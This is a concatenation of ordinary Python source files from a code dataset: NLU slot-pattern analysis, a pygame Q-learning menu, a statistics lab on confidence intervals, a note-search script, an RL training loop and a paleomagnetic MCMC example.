queries under a pattern\r\n\r\n    ## deduplicate patterns\r\n    pattern_queries = defaultdict(int)\r\n    pattern_queries_to_annotated_queries = defaultdict()\r\n    pattern_queries_to_intent = defaultdict()\r\n\r\n    \r\n    tags = ['sharetarget_name', 'file_name', 'file_type', 'sharetarget_type', 'order_ref', 'to_contact_name', 'date', 'files_keyword',\r\n            'file_action', 'file_action_context', 'file_keyword', 'file_folder', 'meeting_starttime', 'contact_name', 'file_recency']\r\n\r\n\r\n    ## dictionary of lists\r\n    ## key : xml_name\r\n    ## value : list of possible values inside <> \r\n    tag_values = defaultdict(list)\r\n\r\n\r\n    for query, ann_query, intent in zip(queries, annotated_queries, intents):\r\n        # print(query)\r\n\r\n        ## using the original query to create new patterns\r\n        new_query = query\r\n        new_annotation = ann_query\r\n\r\n        # for debug\r\n        #print('annotated query {}'.format(new_annotation)) \r\n\r\n        ## extract all constraints (XML pairs) from ann_query\r\n        # new routine, extract <tag>value</tag> pairs\r\n        xmlpairs = re.findall(\"(<.*?>.*?<\\/.*?>)\", ann_query)\r\n\r\n        for xmlpair in xmlpairs:\r\n            # extract the type and value from the xml tag\r\n            xmlTypeEndInd = xmlpair.find(\">\")\r\n\r\n            xmlType = xmlpair[1:xmlTypeEndInd]\r\n\r\n            xmlValue = xmlpair.replace(\"<\"+xmlType+\">\", \"\")\r\n            xmlValue = xmlValue.replace(\"</\"+xmlType+\">\", \"\")\r\n            xmlValue = xmlValue.strip()\r\n\r\n            # only extract certain slots to form patterns\r\n            if 
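To make `reduce_xml_tag_and_remove_xml_value` concrete, here is the same regex and replacement applied to a made-up annotated query (the tag names come from the record's own `tags` list):

```python
import re

ann = 'open the <file_type>deck</file_type> from <contact_name>bob</contact_name>'
for xmlpair in re.findall(r'(<.*?>.*?</.*?>)', ann):
    xml_type = xmlpair[1:xmlpair.find('>')]           # text between '<' and the first '>'
    ann = ann.replace(xmlpair, '<' + xml_type + '>')  # drop the value, keep the bare tag
print(ann)  # open the <file_type> from <contact_name>
```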
domain in DomainToSlotsProcess and xmlType.lower() in DomainToSlotsProcess[domain]:\r\n\r\n \r\n #if xmlType.lower() == 'message_type':\r\n # print('{}'.format(xmlValue))\r\n # print('{}'.format(new_query))\r\n\r\n tag_values[xmlType].extend(xmlValue)\r\n\r\n if xmlType == 'message_type':\r\n new_query = new_query.replace(xmlValue, '')\r\n new_annotation = new_annotation.replace(xmlpair, '')\r\n else:\r\n new_query = new_query.replace(xmlValue, '<{}>'.format(xmlType.lower()))\r\n\r\n #if xmlType.lower() == 'message_type':\r\n # print('{}'.format(new_query))\r\n # print('{}'.format(clean_query(new_query)))\r\n\r\n new_annotation = new_annotation.replace(xmlpair, '<{}>'.format(xmlType.lower()))\r\n\r\n # old routine, all tags being processed\r\n '''\r\n for tag in tags:\r\n keywords = re.findall(rf'<{tag}>(.+?)<\\/{tag}>', ann_query)\r\n \r\n #collecting the variables to fill tag\r\n ## ? keyword do not preprocessing eg: 3S api spec do not do tokenization\r\n tag_values[tag].extend([kw.lower() for kw in keywords])\r\n \r\n # stripping query of tags\r\n ## using originla query to create new annotated query\r\n ## eg: search for 3s api deck, => search for deck since 3s api is tagged as slot in annotated_query \r\n for kw in keywords:\r\n new_query = query.replace(kw, '<{}>'.format(tag))\r\n\r\n '''\r\n\r\n #for debug\r\n #print('{}'.format(new_query))\r\n #print('{}'.format(clean_query(new_query)))\r\n\r\n pattern_queries[clean_query(new_query)] += 1\r\n\r\n # format: a \r\n #pattern_queries_to_annotated_queries[clean_query(new_query)] = clean_query(new_annotation)\r\n # \r\n pattern_queries_to_annotated_queries[clean_query(new_query)] = reduce_xml_tag_and_remove_xml_value(clean_query(new_annotation))\r\n pattern_queries_to_intent[clean_query(new_query)] = intent\r\n\r\n print('-I-: Given queries {}, domain {}, total patterns are {}'.format(len(queries),domain, len(pattern_queries)))\r\n return pattern_queries, tag_values,pattern_queries_to_annotated_queries, pattern_queries_to_intent\r\n\r\n## read *.tsv name and output .txt fils\r\n## txt format: each filename / keypharse will be single line\r\n## tag means slot value here. 
rename it since it is confusing\r\n'''\r\ndef extract_additional_tags(filename):\r\n tags = []\r\n df = pd.read_csv(filename, sep='\\t', encoding=\"utf-8\")\r\n for val in df.List.values:\r\n tags.extend(val.split(';'))\r\n \r\n with open(filename.replace(\".tsv\", \".txt\"), 'w', encoding='utf-8') as f:\r\n for tag in tags:\r\n f.write('{}\\n'.format(tag))\r\n \r\n# step1\r\nextract_additional_tags(\"additionalfilenames.tsv\")\r\nextract_additional_tags(\"additionalfilenameskeyphrases.tsv\")\r\n'''\r\n\r\n\r\n\r\nfileTypeMSB = set()\r\nwith codecs.open('E:\\\\fileAnswer_data_synthesis\\\\CMF_training\\\\files_MSB_measurement_build\\placeholder_tags_chiecha\\\\file_type.txt', 'r', 'utf-8') as fin:\r\n for line in fin:\r\n line = line.strip()\r\n fileTypeMSB.add(line)\r\n\r\n# for deubg\r\nprint(fileTypeMSB)\r\n\r\nfileTypeMSB = list(fileTypeMSB)\r\n\r\n\r\nfileActionMSB = set()\r\nwith codecs.open('E:\\\\fileAnswer_data_synthesis\\\\CMF_training\\\\files_MSB_measurement_build\\placeholder_tags_chiecha\\\\file_action.txt', 'r', 'utf-8') as fin:\r\n for line in fin:\r\n line = line.strip()\r\n fileActionMSB.add(line)\r\n\r\n# for deubg\r\nprint(fileActionMSB)\r\n\r\nfileActionMSB = list(fileActionMSB)\r\n\r\n\r\n\r\n\r\n# tepm folder\r\ntrainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm\\\\tmp\\\\train.tsv'\r\ntrainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm_09162021v1_test12_temp8\\\\domain_svm\\\\tmp\\\\train.tsv'\r\n#trainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm_09162021v1_test12_temp7\\\\domain_svm\\\\tmp\\\\train.tsv'\r\n#trainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm_09162021v1_test12_temp6\\\\domain_svm\\\\tmp\\\\train.tsv'\r\n#trainfile = 'E:\\\\msb_domain_aether\\\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\\\domain_svm_09162021v1_test12_temp5\\\\domain_svm\\\\tmp\\\\train.tsv'\r\n# E:\\msb_domain_aether\\o1_c732ac00-ff6b-4cb3-a92c-eaa8f727e284\\domain_svm_09162021v1_test12_temp6\\domain_svm\\tmp\r\ndf = pd.read_csv(trainfile, sep='\\t', encoding=\"utf-8\", keep_default_na=False, dtype={\r\n 'Query': str, 'Class': str})\r\n\r\n\r\npositive_df = df[df.Class == 'files']\r\nnegative_df = df[df.Class != 'files']\r\n\r\n\r\nfor fileAction in sorted(fileActionMSB):\r\n\r\n \r\n df1 = positive_df.loc[positive_df['Query'].str.contains(fileAction, case=False)]\r\n df2 = negative_df.loc[negative_df['Query'].str.contains(fileAction, case=False)]\r\n\r\n print(\"key : {}\".format(fileAction))\r\n\r\n #print(df1.head)\r\n #print(df2.head)\r\n\r\n\r\n print(df1.shape[0])\r\n print(df2.shape[0])\r\n\r\n\r\n# print('Total postive queries found: {} | Total patterns: {}'.format(pos_queries_cnt, len(all_patterns)))\r\n\r\n# for tag, values in all_tags.items():\r\n# with open('./placeholder_tags/{}.txt'.format(tag.replace(\"_\",\"\")), 'w', encoding='utf-8') as f:\r\n# for value in set(values):\r\n# f.write(value+'\\n')\r\n ","sub_path":"files domain/contexual_lu_data_generator/domain/slot_distribution_analysis.py","file_name":"slot_distribution_analysis.py","file_ext":"py","file_size_in_byte":9647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"489718153","text":"import pygame, sys\nimport threading\nfrom pygame.locals import *\nfrom run import *\n\nWHITE = (255, 255, 255)\nGRAY = (155, 155, 155)\nBLACK = (0, 0, 
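The distribution loop above passes raw `fileAction` strings straight into `Series.str.contains`, which treats the pattern as a regular expression by default. Any slot value containing regex metacharacters will silently mis-match; `regex=False` (or `re.escape`) makes the comparison literal. A small demonstration with made-up rows:

```python
import pandas as pd

df = pd.DataFrame({'Query': ['open file (new)', 'share doc']})
action = 'file (new)'  # parentheses form a regex group, not literal text
print(df.Query.str.contains(action, case=False).tolist())               # [False, False]
print(df.Query.str.contains(action, case=False, regex=False).tolist())  # [True, False]
```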
0)\nMAINBACKCOLOR = (128, 64, 64)\n\nWINW = 1024\nWINW_CENTER = WINW/2\nWINH = 768\nWINH_CENTER = WINH/2 + 50\n\nmainClock = pygame.time.Clock()\npygame.init()\npygame.display.set_caption('Q-Learning')\nscreen = pygame.display.set_mode((WINW, WINH))\nfont = pygame.font.SysFont('Segoe UI', 24)\n\ncolor_active = WHITE\ncolor_passive = GRAY\n\nclick = False\n\ndef set_box_color(value, color_input):\n if value == True:\n color_input = color_active\n return color_input\n else:\n color_input = color_passive\n return color_input\n\ndef draw_text(text, font, color, surface, x, y):\n textobj = font.render(text, 1, color)\n textrect = textobj.get_rect()\n textrect.topleft = (x, y)\n surface.blit(textobj, textrect)\n\ndef main_menu():\n\n start_x = ''\n sx_rect = pygame.Rect(WINW_CENTER + 100, WINH_CENTER - 200, 40, 30)\n active_sx = False\n color_input_sx = color_passive\n\n start_y = ''\n sy_rect = pygame.Rect(WINW_CENTER + 100, WINH_CENTER - 150, 40, 30)\n active_sy = False\n color_input_sy = color_passive\n\n end_x = ''\n ex_rect = pygame.Rect(WINW_CENTER + 100, WINH_CENTER - 50, 40, 30)\n active_ex = False\n color_input_ex = color_passive\n\n end_y = ''\n ey_rect = pygame.Rect(WINW_CENTER + 100, WINH_CENTER, 40, 30)\n active_ey = False\n color_input_ey = color_passive\n \n button_go_text = 'SOLVE'\n button_go = pygame.Rect(WINW_CENTER - 50, WINH_CENTER + 100, 100, 40)\n color_button_go = WHITE\n\n while True:\n screen.fill(MAINBACKCOLOR)\n draw_text('# Setting up Start & End Points (50 x 50) #', font, WHITE, screen, WINW_CENTER - 220, WINH_CENTER - 300)\n\n draw_text('Start Point X Position : ', font, WHITE, screen, WINW_CENTER - 150, WINH_CENTER - 200)\n color_input_sx = set_box_color(active_sx, color_input_sx)\n pygame.draw.rect(screen, color_input_sx, sx_rect, 2)\n draw_text(start_x, font, WHITE, screen, sx_rect.x + 8, sx_rect.y - 2)\n\n draw_text('Start Point Y Position : ', font, WHITE, screen, WINW_CENTER - 150, WINH_CENTER - 150)\n color_input_sy = set_box_color(active_sy, color_input_sy)\n pygame.draw.rect(screen, color_input_sy, sy_rect, 2)\n draw_text(start_y, font, WHITE, screen, sy_rect.x + 8, sy_rect.y - 2)\n\n draw_text('End Point X Position : ', font, WHITE, screen, WINW_CENTER - 150, WINH_CENTER - 50)\n color_input_ex = set_box_color(active_ex, color_input_ex)\n pygame.draw.rect(screen, color_input_ex, ex_rect, 2)\n draw_text(end_x, font, WHITE, screen, ex_rect.x + 8, ex_rect.y - 2)\n\n draw_text('End Point Y Position : ', font, WHITE, screen, WINW_CENTER - 150, WINH_CENTER)\n color_input_ey = set_box_color(active_ey, color_input_ey)\n pygame.draw.rect(screen, color_input_ey, ey_rect, 2)\n draw_text(end_y, font, WHITE, screen, ey_rect.x + 8, ey_rect.y - 2)\n\n pygame.draw.rect(screen, GRAY, button_go)\n draw_text(button_go_text, font, MAINBACKCOLOR, screen, button_go.x + 16, button_go.y + 2)\n \n mx, my = pygame.mouse.get_pos()\n if button_go.collidepoint(mx, my):\n if click:\n game(start_x, start_y, end_x, end_y)\n\n click = False\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if sx_rect.collidepoint(event.pos):\n active_sx = True\n else:\n active_sx = False\n if sy_rect.collidepoint(event.pos):\n active_sy = True\n else:\n active_sy = False\n if ex_rect.collidepoint(event.pos):\n active_ex = True\n else:\n active_ex = False\n if ey_rect.collidepoint(event.pos):\n active_ey = True\n else:\n active_ey = False\n \n if event.button == 1:\n click = True\n\n if event.type == KEYDOWN:\n if 
event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n if active_sx == True:\n if event.key == K_BACKSPACE:\n start_x = ''\n else:\n key = str(event.unicode)\n if key.isdecimal() and len(start_x)<2:\n start_x += event.unicode\n if active_sy == True:\n if event.key == K_BACKSPACE:\n start_y = ''\n else:\n key = str(event.unicode)\n if key.isdecimal() and len(start_y)<2:\n start_y += event.unicode\n if active_ex == True:\n if event.key == K_BACKSPACE:\n end_x = ''\n else:\n key = str(event.unicode)\n if key.isdecimal() and len(end_x)<2:\n end_x += event.unicode\n if active_ey == True:\n if event.key == K_BACKSPACE:\n end_y = ''\n else:\n key = str(event.unicode)\n if key.isdecimal() and len(end_y)<2:\n end_y += event.unicode\n\n pygame.display.update()\n mainClock.tick(60)\n\n\ndef game(start_x, start_y, end_x, end_y):\n running = True\n\n if start_x == '':\n start_x = 0\n if start_y == '':\n start_y = 0\n if end_x == '':\n end_x = 49\n if end_y == '':\n end_y = 49\n\n app = Run(int(start_x),int(start_y),int(end_x),int(end_y))\n\n t1 = threading.Thread(target=app.train)\n t1.daemon = True\n t1.start()\n \n while running:\n screen.fill(MAINBACKCOLOR)\n statex = app.getState()\n k=0\n for i in range(50):\n for j in range(50):\n pygame.draw.rect(screen, (app.game_board[k].color_r, app.game_board[k].color_g, app.game_board[k].color_b), (j * 15 + 135, i * 15 + 10, 14, 14))\n pygame.draw.circle(screen, MAINBACKCOLOR, (statex[1] * 15 + 142, statex[0] * 15 + 17), 7, 0)\n k+=1\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n pygame.quit()\n sys.exit()\n\n pygame.display.update()\n mainClock.tick(60)\n\nmain_menu()","sub_path":"QLearning/mainmenu.py","file_name":"mainmenu.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"230613795","text":"from itertools import *\n\nprint(\"Hello world!\")\n\nfor i, num in enumerate(range(54,65)):\n\tprint(\"Number {0} is {1}\".format(i,num))\n\nstupid=0\nwhile(True):\n\tdogName = input(\"Who is the best dog?\")\n\tif dogName==\"Laika\":\n\t\tprint(\"That's right! Oogibooboo!\")\n\t\tbreak\n\telse:\n\t\tstupid += 1\n\t\tprint(\"Errr hello??! 
You've got it wrong {0} time{1}\\nTry again...\".format(stupid, \"\" if stupid==1 else \"s, dummy\"))\n\t\t\nprint(\"Line added as part of Git set-up & testing.\")\nprint(\"Line added as an alteration under new branch.\")","sub_path":"chris.py","file_name":"chris.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"240713322","text":"import math\nimport random\nimport statistics\nimport numpy as np\nimport scipy.stats\nimport matplotlib.pyplot as plt\n\ndef main():\n N = 1_000_000\n MEAN = 100\n sigma = 12\n Z1 = 1.96\n Z2 = 2.58\n\n population = np.random.normal(MEAN, sigma, N)\n # print(type(population))\n\n populationList = population.tolist()\n\n meanList = []\n posInList = []\n negaInList = []\n posInList99 = []\n negaInList99 = []\n n_value = []\n\n #n = random.randint(1, 100)\n for n in range(1, 201):\n n_value.append(n)\n sample = random.sample(populationList, n)\n sample_mean = statistics.mean(sample)\n meanList.append(sample_mean)\n\n #Calculate the confidence interval of 95\n interList = calInterval(MEAN, sigma, n, 95)\n #Add the positive and negative interval to approriate list\n posInList.append(interList[0])\n negaInList.append(interList[1])\n\n #Calculate the confidence interval of 99\n interList99 = calInterval(MEAN, sigma, n, 99)\n #Add the positive and negative interval to approriate list\n posInList99.append(interList99[0])\n negaInList99.append(interList99[1])\n\n #print(\"Mean: \", mean)\n print(\"Meanlist: \", meanList)\n print(\"MeanList size: \", len(meanList))\n print(\"PosList: \", posInList)\n print(\"PosList len: \", len(posInList))\n print(\"NegaList: \", negaInList)\n print(\"NegaList len: \", len(negaInList))\n print(\"n value: \", n_value)\n\n #95 confidence graph\n figure1 = plt.figure(1)\n plt.plot(n_value, meanList, linestyle=' ', marker=\"x\")\n plt.plot(n_value, posInList, 'r', linestyle='--')\n plt.plot(n_value, negaInList, 'r', linestyle='--')\n plt.axhline(y=100, color=\"black\")\n plt.xlabel(\"Sample sizes\")\n plt.ylabel(\"x_bar\")\n plt.title(\"Sample means and 95% confidence intervals\")\n\n #99 confidence graph\n figure2 = plt.figure(2)\n plt.plot(n_value, meanList, linestyle=' ', marker=\"x\")\n plt.plot(n_value, posInList99, 'g', linestyle=':')\n plt.plot(n_value, negaInList99, 'g', linestyle=':')\n plt.axhline(y=100, color=\"black\")\n plt.xlabel(\"Sample sizes\")\n plt.ylabel(\"x_bar\")\n plt.title(\"Sample means and 99% confidence intervals\")\n\n plt.show()\n\n print(\"n: \", n)\n print(\"sample: \", sample)\n #\n # print(population)\n # print(\"Size: \", population.size)\n # print(\"list: \", populationList)\n # print(\"Size: \", len(populationList))\n\ndef calInterval(mean, sigma, sample_size, con_level):\n interval = []\n if (con_level == 95):\n result = mean + 1.96 * (sigma / math.sqrt(sample_size))\n resultNegative = mean - 1.96 * (sigma / math.sqrt(sample_size))\n interval.append(result)\n interval.append(resultNegative)\n elif (con_level == 99):\n result = mean + 2.58 * (sigma / math.sqrt(sample_size))\n resultNegative = mean - 2.58 * (sigma / math.sqrt(sample_size))\n interval.append(result)\n interval.append(resultNegative)\n return interval\nmain()","sub_path":"lab5/lab5Q1.py","file_name":"lab5Q1.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"277968431","text":"def search(main_dir):\n # import command line packages\n import os\n\n # 
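For the population in `lab5Q1.py` (σ = 12, z = 1.96 and 2.58), the half-width of the interval returned by `calInterval` is z·σ/√n; with n = 36, for instance, the 95% band is ±3.92 around the mean:

```python
import math

sigma, n = 12, 36
print(1.96 * sigma / math.sqrt(n))  # 3.92  (95% half-width)
print(2.58 * sigma / math.sqrt(n))  # 5.16  (99% half-width)
```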
import time package\n import time\n \n # search through each note file\n # if there is a match, then copy the filename and the note\n search_loop = True\n while search_loop:\n # collect the search term or phrase\n find = input('\\nEnter in the term or phrase you would like to search for:\\n\\n')\n\n print('\\nSearching. . .')\n main_dir_list = next(os.walk('%s' %main_dir))[1]\n main_dir_list.remove('z_scripts')\n for top_level_dir in main_dir_list: #main dir\n if top_level_dir != 'settings':\n proj_dir_list = next(os.walk('%s/%s' %(main_dir, top_level_dir)))[1]\n for proj_level_dir in proj_dir_list: #project dir\n task_dir_list = next(os.walk('%s/%s/%s' %(main_dir, top_level_dir, proj_level_dir)))[1]\n for task_level_dir in task_dir_list: #task dir\n note_dir_list = next(os.walk('%s/%s/%s/%s' %(main_dir, top_level_dir, proj_level_dir, task_level_dir)))[1]\n for note_level_dir in note_dir_list: #note dir\n low_level_list = next(os.walk('%s/%s/%s/%s/%s' %(main_dir, top_level_dir, proj_level_dir, task_level_dir, note_level_dir)))[2]\n for low_level_dir in low_level_list:\n # read in the file\n taskfile = open('%s/%s/%s/%s/%s/%s' %(main_dir, top_level_dir, proj_level_dir, task_level_dir, note_level_dir, low_level_dir), 'r')\n taskfile = taskfile.read()\n\n # if the search terms match, copy it to the command line\n if find in taskfile:\n print('\\n--------------------\\n%s\\n--------------------\\n%s\\n\\n' %(task_level_dir.upper, taskfile))\n \n time.sleep(.1)\n \n #do another search?\n keep_searching_loop = True\n while keep_searching_loop:\n keep_searching = input('\\n\\nWould you like to do another search? (y/n): ')\n if (keep_searching == 'y') or (keep_searching == ''):\n keep_searching_loop = False\n elif keep_searching == 'n':\n search_loop = False\n keep_searching_loop = False\n else: #wtf\n print('\\nWait, that don\\'t make no sense! Try again.\\n')","sub_path":"z_scripts/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"638909060","text":"import logging\nlogging.disable(logging.CRITICAL)\n\nfrom tabulate import tabulate\nfrom mjrl.utils.make_train_plots import make_train_plots\nfrom mjrl.utils.gym_env import GymEnv\nfrom mjrl.samplers.core import sample_paths\nimport numpy as np\nimport pickle\nimport time as timer\nimport os\nimport copy\n\ndef train_agent(job_name, agent,\n seed = 0,\n niter = 101,\n gamma = 0.995,\n gae_lambda = None,\n num_cpu = 1,\n sample_mode = 'trajectories',\n num_traj = 50,\n num_samples = 50000, # has precedence, used with sample_mode = 'samples'\n save_freq = 10,\n evaluation_rollouts = None,\n plot_keys = ['stoc_pol_mean'],\n ):\n\n np.random.seed(seed)\n if os.path.isdir(job_name) == False:\n os.mkdir(job_name)\n previous_dir = os.getcwd()\n os.chdir(job_name) # important! 
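`search.py` re-implements recursion by chaining `next(os.walk(...))[1]` four levels deep, which hard-codes the directory depth. `os.walk` already recurses, so an equivalent single loop (pruning the same `z_scripts`/`settings` folders, and printing the file path rather than the uncalled `task_level_dir.upper` bound method) could look like this sketch:

```python
import os

def find_in_notes(main_dir, term):
    for root, dirs, files in os.walk(main_dir):
        dirs[:] = [d for d in dirs if d not in ('z_scripts', 'settings')]  # prune in place
        for name in files:
            path = os.path.join(root, name)
            with open(path, 'r') as fh:
                text = fh.read()
            if term in text:
                print('\n--------------------\n%s\n--------------------\n%s\n' % (path, text))
```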
we are now in the directory to save data\n if os.path.isdir('iterations') == False: os.mkdir('iterations')\n if os.path.isdir('logs') == False and agent.save_logs == True: os.mkdir('logs')\n best_policy = copy.deepcopy(agent.policy)\n best_perf = -1e8\n train_curve = best_perf*np.ones(niter)\n mean_pol_perf = 0.0\n e = GymEnv(agent.env.env_id)\n\n for i in range(niter):\n print(\"......................................................................................\")\n print(\"ITERATION : %i \" % i)\n\n if train_curve[i-1] > best_perf:\n best_policy = copy.deepcopy(agent.policy)\n best_perf = train_curve[i-1]\n\n N = num_traj if sample_mode == 'trajectories' else num_samples\n args = dict(N=N, sample_mode=sample_mode, gamma=gamma, gae_lambda=gae_lambda, num_cpu=num_cpu)\n stats = agent.train_step(**args)\n train_curve[i] = stats[0]\n\n if evaluation_rollouts is not None and evaluation_rollouts > 0:\n print(\"Performing evaluation rollouts ........\")\n eval_paths = sample_paths(num_traj=evaluation_rollouts, policy=agent.policy, num_cpu=num_cpu,\n env=e.env_id, eval_mode=True, base_seed=seed)\n mean_pol_perf = np.mean([np.sum(path['rewards']) for path in eval_paths])\n if agent.save_logs:\n agent.logger.log_kv('eval_score', mean_pol_perf)\n\n if i % save_freq == 0 and i > 0:\n if agent.save_logs:\n agent.logger.save_log('logs/')\n make_train_plots(log=agent.logger.log, keys=plot_keys, save_loc='logs/')\n policy_file = 'policy_%i.pickle' % i\n baseline_file = 'baseline_%i.pickle' % i\n pickle.dump(agent.policy, open('iterations/' + policy_file, 'wb'))\n pickle.dump(agent.baseline, open('iterations/' + baseline_file, 'wb'))\n pickle.dump(best_policy, open('iterations/best_policy.pickle', 'wb'))\n\n # print results to console\n if i == 0:\n result_file = open('results.txt', 'w')\n print(\"Iter | Stoc Pol | Mean Pol | Best (Stoc) \\n\")\n result_file.write(\"Iter | Sampling Pol | Evaluation Pol | Best (Sampled) \\n\")\n result_file.close()\n print(\"[ %s ] %4i %5.2f %5.2f %5.2f \" % (timer.asctime(timer.localtime(timer.time())),\n i, train_curve[i], mean_pol_perf, best_perf))\n result_file = open('results.txt', 'a')\n result_file.write(\"%4i %5.2f %5.2f %5.2f \\n\" % (i, train_curve[i], mean_pol_perf, best_perf))\n result_file.close()\n if agent.save_logs:\n print_data = sorted(filter(lambda v: np.asarray(v[1]).size == 1,\n agent.logger.get_current_log().items()))\n print(tabulate(print_data))\n\n # final save\n pickle.dump(best_policy, open('iterations/best_policy.pickle', 'wb'))\n if agent.save_logs:\n agent.logger.save_log('logs/')\n make_train_plots(log=agent.logger.log, keys=plot_keys, save_loc='logs/')\n os.chdir(previous_dir)\n","sub_path":"mjrl/utils/train_agent.py","file_name":"train_agent.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565201202","text":"import sys, os\n\nimport itertools\nimport numpy as np\nimport scipy.optimize\nimport matplotlib.pyplot as plt\n\nimport cartopy.crs as ccrs\n\nimport pymc\nfrom pymc.utils import hpd\n\nplt.style.use('../bpr.mplstyle')\n\nsys.path.insert(1, os.path.abspath('../../mcplates'))\nimport mcplates\nfrom mcplates.plot import cmap_red, cmap_green\n\ndbname = 'two_euler_poles'\nn_euler_poles=2\n\n# Generate a synthetic data set\nages = [260., 195., 130., 65., 0.]\nstart_age = 260.\nhidden_start_pole = [-60., 0.]\nhidden_euler_poles = [ [-60., 41.], [60., 41.] 
]\nhidden_euler_rates = [1., 1.]\nhidden_changepoint = 130.\n#Make a dummy APW path to create the synthetic data\ndummy_pole_position_fn = mcplates.APWPath.generate_pole_position_fn( n_euler_poles, start_age)\npole_list = []\nfor a in ages:\n lon_lat = dummy_pole_position_fn(hidden_start_pole, a, 0.0, 0.0,\n hidden_euler_poles[0], hidden_euler_poles[1],\n hidden_euler_rates[0], hidden_euler_rates[1], hidden_changepoint)\n pole_list.append( mcplates.PaleomagneticPole( lon_lat[0], lon_lat[1], angular_error = 10., age=a, sigma_age = 0.01))\n\npath = mcplates.APWPath( dbname, pole_list, n_euler_poles)\npath.create_model(watson_concentration=0.0, rate_scale=2.5)\n\n\ndef plot_result():\n\n fig = plt.figure( figsize=(8,4) )\n ax = fig.add_subplot(1,2,1, projection = ccrs.Orthographic(0.,30.))\n #ax = fig.add_subplot(1,2,1, projection = ccrs.Mollweide(0.))\n ax.gridlines()\n ax.set_global()\n\n colors = itertools.cycle([cmap_red, cmap_green])\n direction_samples = path.euler_directions()\n for directions in direction_samples:\n mcplates.plot.plot_distribution( ax, directions[:,0], directions[:,1], resolution=60, cmap=next(colors))\n for hidden_euler_pole in hidden_euler_poles:\n euler_lon = hidden_euler_pole[0]\n euler_lat = hidden_euler_pole[1]\n ax.plot(euler_lon,euler_lat, 'k*', transform=ccrs.Geodetic(), markersize=10)\n\n n_paths=100\n interval = max(1, int(len(path.mcmc.db.trace('rate_0')[:]) / n_paths))\n pathlons, pathlats = path.compute_synthetic_paths(n=n_paths)\n changepoints = path.changepoints()[0][::interval]\n for pathlon,pathlat,change in zip(pathlons,pathlats,changepoints):\n switch = int(float(len(pathlon))*change/(max(ages)-min(ages)))\n ax.plot(pathlon[:switch],pathlat[:switch], transform=ccrs.PlateCarree(), color='darkred', alpha=0.05 )\n ax.plot(pathlon[switch:],pathlat[switch:], transform=ccrs.PlateCarree(), color='darkgreen', alpha=0.05 )\n\n for p in pole_list:\n p.plot(ax)\n ax.set_title('(a)')\n\n ax = fig.add_subplot(1,2,2)\n rate_samples = path.euler_rates()\n\n c = 'darkred'\n ax.hist(rate_samples[0], bins=15, normed=True, edgecolor='none', color=c, alpha=0.5)\n # plot median, credible interval\n credible_interval = hpd(rate_samples[0], 0.05)\n median = np.median(rate_samples)\n print(\"Rotation 0: median %f, credible interval \"%(median), credible_interval)\n ax.axvline( median, lw=2, color=c )\n ax.axvline( credible_interval[0], lw=2, color=c, linestyle='dashed')\n ax.axvline( credible_interval[1], lw=2, color=c, linestyle='dashed')\n ax.axvline( hidden_euler_rates[0], lw=2, color='black', linestyle='dotted')\n\n c = 'darkgreen'\n ax.hist(rate_samples[1], bins=15, normed=True, edgecolor='none', color=c, alpha=0.5)\n # plot median, credible interval\n credible_interval = hpd(rate_samples[1], 0.05)\n median = np.median(rate_samples)\n print(\"Rotation 1: median %f, credible interval \"%(median), credible_interval)\n ax.axvline( median, lw=2, color=c )\n ax.axvline( credible_interval[0], lw=2, color=c, linestyle='dashed')\n ax.axvline( credible_interval[1], lw=2, color=c, linestyle='dashed')\n ax.axvline( hidden_euler_rates[1], lw=2, color='black', linestyle='dotted')\n\n ax.set_title('(b)')\n ax.set_xlabel(r'Rotation rate $\\,^\\circ / \\mathrm{Myr}$')\n ax.set_ylabel(r'Posterior probability density')\n plt.tight_layout()\n plt.savefig(\"two_euler_poles.pdf\")\n #plt.show()\n\nif __name__ == \"__main__\":\n import os\n if os.path.isfile(dbname+'.pickle'):\n path.load_mcmc()\n else:\n path.sample_mcmc(100000)\n 
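The plotting code relies on `pymc.utils.hpd` for the dashed credible-interval lines. For a unimodal posterior sample, the highest-posterior-density interval is simply the narrowest window covering 1−α of the sorted draws, which is easy to compute directly; a sketch of that computation (not pymc's actual source):

```python
import numpy as np

def hpd_interval(samples, alpha=0.05):
    s = np.sort(np.asarray(samples))
    k = int(np.floor((1 - alpha) * len(s)))  # draws spanned by each candidate window
    widths = s[k:] - s[:len(s) - k]
    i = int(np.argmin(widths))               # narrowest window wins
    return s[i], s[i + k]
```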
